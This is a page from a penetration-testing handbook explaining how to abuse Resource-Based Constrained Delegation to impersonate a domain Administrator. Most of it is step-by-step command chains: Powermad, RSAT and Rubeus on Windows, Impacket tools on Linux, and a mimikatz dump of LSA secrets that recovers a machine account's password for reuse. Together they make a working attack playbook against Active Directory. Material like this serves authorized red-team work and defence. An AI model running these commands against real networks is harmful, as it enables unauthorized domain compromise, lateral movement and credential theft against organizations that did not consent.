Syslifters Handbook

English

Deutsch

English

Deutsch

Appearance

Resource-Based Constrained Delegation (RBCD)

Unlike classic constrained delegation (configured by a domain admin on the delegating account), RBCD is configured on the resource itself: the attribute msDS-AllowedToActOnBehalfOfOtherIdentity of the target object lists which principals are allowed to delegate to it. If we can write that attribute on a target computer, we can nominate an attacker-controlled account, then chain S4U2Self into S4U2Proxy to obtain a service ticket as any user (typically Administrator) for any service of that target.

See the diagram on Delegations overview for the trust direction.

Requirements:

  • Write access to msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer object (WriteAccountRestrictions, GenericAll, GenericWrite or full control via owner/WriteDACL).
  • An account we control that has an SPN. A computer account always has one; MachineAccountQuota (default 10) lets any authenticated domain user create computer accounts.
  • DC on Server 2012 R2 or newer (RBCD is processed by the KDC since that version).
  • The user we want to impersonate must not have Account is sensitive and cannot be delegated set and must not be in Protected Users.

Attack chain (Windows / Rubeus + RSAT)

The Active Directory PowerShell module exposes Set-ADComputer -PrincipalsAllowedToDelegateToAccount which writes msDS-AllowedToActOnBehalfOfOtherIdentity correctly for us.

powershell
# 1. Create a controlled computer account (Powermad - no admin, no RSAT)
New-MachineAccount -MachineAccount ATTACKER -Password (ConvertTo-SecureString 'Password123!' -AsPlainText -Force)

# 2. Set RBCD on the target (RSAT AD module on the attacker host)
Set-ADComputer TARGET -PrincipalsAllowedToDelegateToAccount ATTACKER$

# Verify
Get-ADComputer TARGET -Properties PrincipalsAllowedToDelegateToAccount

# 3. Get the attacker computer's AES256 key, then S4U as Administrator and inject the resulting TGS
Rubeus.exe hash /password:Password123! /user:ATTACKER /domain:lab.local
Rubeus.exe s4u /user:ATTACKER$ /aes256:<hash> /impersonateuser:Administrator /msdsspn:cifs/target.lab.local /ptt

The same primitive works for any SPN the target exposes (http/, host/, ldap/, mssqlsvc/, ...).

Attack chain (Linux / Impacket)

sh
# 1. Create a controlled computer account (default MachineAccountQuota = 10)
impacket-addcomputer -computer-name 'ATTACKER$' -computer-pass 'Password123!' \
    -dc-host dc01.lab.local 'lab.local/lowpriv:Summer2025!'

# 2. Write our SID into msDS-AllowedToActOnBehalfOfOtherIdentity on the target
impacket-rbcd -delegate-to 'TARGET$' -delegate-from 'ATTACKER$' -action write \
    'lab.local/lowpriv:Summer2025!'

# 3. Request a service ticket as Administrator for a service of the target
impacket-getST -spn 'cifs/target.lab.local' -impersonate Administrator \
    'lab.local/ATTACKER$:Password123!'

# 4. Use the ticket
export KRB5CCNAME=Administrator@cifs_target.lab.local@LAB.LOCAL.ccache
impacket-psexec -k -no-pass target.lab.local

Without creating a new computer account

When MachineAccountQuota = 0 (or creating a rogue computer is undesirable for opsec), we can reuse the machine account of a host we already control as the SPN-bearing principal.

Prerequisites:

  • Local admin / SYSTEM on a domain-joined host (call it HOSTA).
  • Write access to msDS-AllowedToActOnBehalfOfOtherIdentity on the target object (HOSTB) is still required.
powershell
# 1. As SYSTEM, read the machine account password from LSA secrets
mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::secrets
# -> look for $MACHINE.ACC; the password is a raw hex blob

Convert the hex machine password to a Kerberos AES256 key using the script in Tool cheat sheet: Convert HEX computer machine password to AES key for Rubeus. The salt is <DOMAIN.UPPER>host<hostname.lower>.<domain.lower>

powershell
# 2. Write HOSTA's computer account into HOSTB's RBCD attribute
Set-ADComputer HOSTB -PrincipalsAllowedToDelegateToAccount HOSTA$

# 3. S4U as Administrator using HOSTA's derived AES256 key
Rubeus.exe s4u /user:HOSTA$ /aes256:<aes256-from-script> /impersonateuser:Administrator /msdsspn:cifs/hostb.lab.local /ptt

Mimikatz also produces the raw RC4 / NTLM of the machine account, which Rubeus accepts via /rc4:.

Local privilege escalation variant

If you are looking for an LPE abusing RBCD, see LPE via Kerberos relaying.